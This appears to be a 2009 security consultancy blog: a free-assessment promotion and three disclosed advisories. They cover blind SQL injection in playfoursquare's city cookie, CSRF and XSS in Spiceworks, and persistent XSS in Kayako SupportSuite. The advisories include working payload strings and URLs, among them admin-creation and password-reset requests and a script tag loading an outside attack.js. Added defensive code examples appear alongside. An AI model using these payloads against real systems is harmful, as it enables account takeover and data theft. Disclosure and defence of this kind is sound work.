Aug 17 2009

Are you as secure as you think you are?

Most businesses rely heavily on computers and networks to get work done these days. When your computer or network fails you in some way, that has a direct impact on your bottom line. In an effort to help you understand the risks associated with using these essential pieces of technology in your business, and help mitigate them, we are giving away a whole pile of consulting time in the form of free security assessments.

What do you get with the free assessment?

  • 30 minutes of network and website security assessment by the nGenuity team of security ninjas.
  • 30 minutes of discussion / debrief about any security issues identified.
  • 20% discount on any IT and security consulting and support services through the remainder of 2009.
  • No hassle or obligation to purchase anything. This is not a hard sell, this is a free service we are offering to improve awareness on network / website security.

Follow this link for more information on nGenuity’s security assessments.

I already have an “IT” person / company that handles this type of stuff for me.

Chances are your IT person or company is doing a great job supporting you, but what if that isn’t the case and you just haven’t noticed yet? What if security isn’t their thing? nGenuity already works with a few IT providers to complement the services they provide. There is nothing wrong with getting a second opinion from an expert.

Where do I sign up?

Call us at 509-396-2075 and mash the first number that you hear or email us at info@ngenuity-is.com

Look for the ad (designed by &yet) for this free assessment in the Tri-City Area Journal of Business (page 26.)

Aug 14 2009

Blind SQL Injection in playfoursquare.com

I stumbled upon a fun little SQL injection in playfoursquare the other day. I notified them but have not heard back, but it appears it has been addressed so here are the details.

     It was possible to inject specially crafted SQL into the cookie "cookieCityID"
     which provides 

     If you set the cookie to the value below the query will take roughly 5-7
     seconds to return with this "True" condition (1=1).

     (SELECT IF(1=1,BENCHMARK(1000000,SHA1(1)),0))

     If you change the logic condition to 1=0 (False) the query returns
     immediately demonstrating that blind SQL injection is possible.

     (SELECT IF(1=0,BENCHMARK(1000000,SHA1(1)),0))
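
The root cause described above is a cookie value that is evaluated as SQL instead of being treated as data. The following is an added example, not code from playfoursquare or from the original post: it contrasts a concatenated lookup with an allow-listed, parameterized one. The table, the function names and the SQLite stand-in expressions are assumptions; SQLite has no BENCHMARK(), so the constructed expressions give a true/false answer through the returned row rather than through a delay.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's city table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cities (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO cities VALUES (?, ?)",
                   [(1, "Kennewick"), (2, "Richland")])
    return db

def city_concatenated(db, cookie_city_id):
    """Weak form: the cookie text becomes part of the SQL statement."""
    sql = "SELECT name FROM cities WHERE id = " + cookie_city_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def city_parameterized(db, cookie_city_id):
    """Hardened form: allow-list the cookie, then bind it as data."""
    if not re.fullmatch(r"[0-9]{1,9}", cookie_city_id):
        return None  # anything other than a short decimal id is rejected
    row = db.execute("SELECT name FROM cities WHERE id = ?",
                     (int(cookie_city_id),)).fetchone()
    return row[0] if row else None

# Cookie value quoted in the advisory (MySQL syntax).
ADVISORY_VALUE = "(SELECT IF(1=1,BENCHMARK(1000000,SHA1(1)),0))"
# Constructed SQLite expressions playing the same true/false role.
TRUE_EXPR = "(SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END)"
FALSE_EXPR = "(SELECT CASE WHEN 1=0 THEN 1 ELSE 2 END)"

if __name__ == "__main__":
    db = make_db()
    for value in ("2", TRUE_EXPR, FALSE_EXPR, ADVISORY_VALUE):
        print(repr(value), "->", city_parameterized(db, value))
```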
III. REFERENCES
     [1] - http://playfoursquare.com

Copyright (c) 2009 nGenuity Information Services, LLC
Aug 08 2009

[NGENUITY] – Spiceworks Multiple Vulnerabilities (XSS & CSRF)

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
   Application: Spiceworks 3.6.31847
        Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS, CSRF

  I. BACKGROUND
     Spiceworks is a network management, monitoring, helpdesk, etc. application that
     uses a web-based front end.

 II. DETAILS
     Multiple vulnerabilities exist within the Spiceworks platform that can be used
     to take over or otherwise abuse the application / infrastructure.

     These vulnerabilities allow for the following attack scenarios to be executed.

     1. Creation of a new Administrator account
     2. Password reset of users

     Exploit Examples:
     Create Administrator Account:

http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Blast_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&user%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD

     User Password Reset:

http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD&editorId=password_entry_for_1

     Edit: 8/10/2009
     Thank you to Melinda Rosario for pointing out that I forgot to include any details on the XSS
     portion of this advisory. It is a simple reflected XSS in the search parameter.

     Example:

http://example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

     Edit: 8/11/2009
     Per Francis Sullivan at Spiceworks: Update to the latest Spiceworks 4.1 where the security issues
     are addressed.
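
Both request examples above change state through a plain GET URL with no unpredictable value in it, which is what makes them forgeable from another site. The following is an added example, not Spiceworks code and not part of the original advisory: a request gate that refuses non-POST requests on those routes and requires a session-bound token. The function names, the `csrf_token` form field and the session ids are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Per-process signing key (assumption: a deployment would persist and rotate it).
SERVER_KEY = secrets.token_bytes(32)

# State-changing routes named in the advisory.
PROTECTED_PREFIXES = ("/settings/users/create",
                      "/settings/users/change_password")

# Password-reset URL from the advisory, used here as test input.
ADVISORY_URL = ("http://example.com/settings/users/change_password/1"
                "?user%5Bpassword%5D=PASSWORD&editorId=password_entry_for_1")

def issue_token(session_id):
    """Token bound to one session; embedded in forms the application renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def is_allowed(method, url, session_id, form):
    """Decide whether a request may reach a state-changing handler."""
    path = urlsplit(url).path
    if not path.startswith(PROTECTED_PREFIXES):
        return True   # read-only route, nothing to protect here
    if method.upper() != "POST":
        return False  # a GET must never create users or reset passwords
    supplied = form.get("csrf_token", "")
    # Constant-time comparison on bytes, so odd input cannot raise or leak timing.
    return hmac.compare_digest(supplied.encode(),
                               issue_token(session_id).encode())

if __name__ == "__main__":
    print(is_allowed("GET", ADVISORY_URL, "sess-a", {}))   # False
    good = {"csrf_token": issue_token("sess-a")}
    print(is_allowed("POST", ADVISORY_URL, "sess-a", good))  # True
```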
III. REFERENCES
     [1] - http://www.spiceworks.com
     [2] - http://cwe.mitre.org/data/definitions/79.html
     [3] - http://cwe.mitre.org/data/definitions/352.html

 IV. VENDOR COMMUNICATION
     4.1.2009 - Vulnerability Discovery & Vendor Notification
     4.6.2009 - Second attempt to contact vendor
     4.7.2009 - Initial vendor response
     8.8.2009 - Advisory Release

Copyright (c) 2009 nGenuity Information Services, LLC
Aug 08 2009

[NGENUITY] Ticket Subject Persistent XSS in Kayako SupportSuite

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite
   Application: SupportSuite v3.50.06
        Vendor: Kayako
Vendor website: http://www.kayako.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: Persistent Cross-Site Scripting

  I. BACKGROUND
     "SupportSuite is [Kayako's] flagship product, integrating the ticket and
      e-mail management features of eSupport with the live chat and visitor
      monitoring features of LiveResponse." [1]

 II. DETAILS
     The subject field of a newly created support ticket is not properly encoded before
     being sent to the browser when the ticket details are viewed. For more information
     on cross-site scripting, please refer to the Common Weakness Enumeration specification
     available at cwe.mitre.org [2].

     An example attack might look similar to the following.

     </title><script src="example.com/attack.js"></script>

     This vulnerability is fixed in version 3.60.x
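
The fix for this class of bug is to HTML-encode the subject at output time. The following is an added example, not Kayako code and not part of the original advisory: it renders the advisory's sample subject with and without encoding and counts the script elements an HTML parser actually sees. The template (subject placed in both `<title>` and `<h1>`) and all function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical ticket-view template: the subject appears in <title> and <h1>.
TEMPLATE = ("<html><head><title>Ticket: {subject}</title></head>"
            "<body><h1>{subject}</h1></body></html>")

# Ticket subject taken from the advisory's example.
ADVISORY_SUBJECT = '</title><script src="example.com/attack.js"></script>'

class ScriptCounter(HTMLParser):
    """Counts <script> start tags that survive into the parsed document."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

def count_scripts(page):
    parser = ScriptCounter()
    parser.feed(page)
    parser.close()
    return parser.scripts

def render_unencoded(subject):
    """Behaviour described in the advisory: subject sent to the browser as-is."""
    return TEMPLATE.format(subject=subject)

def render_encoded(subject):
    """Subject encoded for HTML text context before it is placed in the page."""
    return TEMPLATE.format(subject=escape(subject, quote=True))

if __name__ == "__main__":
    print("unencoded:", count_scripts(render_unencoded(ADVISORY_SUBJECT)))
    print("encoded:  ", count_scripts(render_encoded(ADVISORY_SUBJECT)))
```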
III. REFERENCES
     [1] - http://www.kayako.com
     [2] - http://cwe.mitre.org/data/definitions/79.html

 IV. VENDOR COMMUNICATION
     7.17.2009 - Vulnerability Discovery
     7.20.2009 - Initial Vendor Response
     7.21.2009 - Patch created, Will be pushed to next stable release
     8.08.2009 - Advisory released

Copyright (c) 2009 nGenuity Information Services, LLC
